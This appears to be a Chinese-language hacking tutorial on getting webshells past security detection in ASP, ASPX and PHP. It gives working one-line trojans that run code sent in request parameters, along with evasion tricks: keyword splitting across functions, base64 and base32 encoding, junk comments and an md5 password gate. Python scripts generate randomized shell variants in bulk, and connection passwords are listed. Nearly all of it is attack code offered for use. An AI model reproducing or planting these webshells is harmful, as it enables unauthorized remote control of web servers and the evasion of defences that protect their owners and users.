ASP绕过
相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。
但是依然有不少方法可以绕过
首先asp的一句话木马如下:
<%execute(request("x"))%>
使用函数分割关键字
<%
Function b():
b = request("x")
End Function
Function a():
eXecUTe(b())
End Function
a()
%>
连接密码:x
批量脚本
import random
shell = '''<%
<!--
Function {0}():
{0} = request("{1}")
End Function
Function {2}():
execUte({0}())
End Function
{2}()
-->
%>'''
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
def build_webshell():
FunctionName = random_name(4)
parameter = random_name(4)
FunctionName1 = random_name(4)
shellc = shell.format(FunctionName, parameter, FunctionName1)
return shellc
if __name__ == '__main__':
print(build_webshell())
连接密码:VXAE
ASPX
其实原理是一样的,同样使用函数分割关键字
将Request.Form["pureqh"] 和 unsafe分割为两份使用两个函数拼接
<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form["pureqh"];
var b="unsa",c="fe",d=b+c;
function fun()
{
return a;
}
function fun1()
{
eval(fun(),d);
}
fun1()
%>
批量脚本:
import random
shell = '''<%@ Page Language="Jscript" Debug=true%>
<%
var {
0}=Request.Form["pureqh"];
var {
1}="unsa",{
5}="fe",{
4}={
1}+{
5};
function {
2}()
{
6}
return {
0};
{
7}
function {
3}()
{
6}
eval({
2}(),{
4});
{
7}
{
3}()
%>'''
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
parameter = random_name(2)
parameter1 = random_name(3)
FunctionName = random_name(4)
FunctionName1 = random_name(5)
parameter2 = random_name(6)
parameter3 = random_name(7)
lef = '''{'''
rig = '''}'''
shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
return shellc
if __name__ == '__main__':
print (build_webshell())
连接密码:pureqh
PHP
一句话木马:
<?php @eval($_POST('a'));?>
<?php
class BTAG{
public $QOMYW = null;
public $XGTCPL = null;
public $YIOXAL = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->QOMYW = 'ZXZhbCgkX1BPU';
$this->YIOXAL = '1RbYV0pOw==';
$this->XGTCPL = @base64_decode($this->QOMYW.$this->YIOXAL);
@eval("/*#`|W$~Q*/".$this->XGTCPL."/*#`|W$~Q*/");
}}}
new BTAG();
?>
使用base32处理eval($_POST[zero]);
<?php
class ZQIH{
public $a = null;
public $b = null;
public $c = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LGZOJH = @base32_decode($this->a);
@eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");
}}}
new ZQIH();
function base32_encode($input) {
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 8;
$v += ord($input[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$output .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);
}
}
if ($vbits > 0) {
$v <<= (5 - $vbits);
$output .= $BASE32_ALPHABET[$v];
}
return $output;
}
function base32_decode($input) {
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 5;
if ($input[$i] >= 'a' && $input[$i] <= 'z') {
$v += (ord($input[$i]) - 97);
} elseif ($input[$i] >= '2' && $input[$i] <= '7') {
$v += (24 + $input[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8) {
$vbits -= 8;
$output .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);
}
}
return $output;
}
?>
连接密码:zero
批量代码
import random
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
连接密码:zero
这里附录一个 我 之前收录的一个
<?php
@eval('' . get() . '');
function get()
{
$get = $_POST['password'];
return $get;
}
?>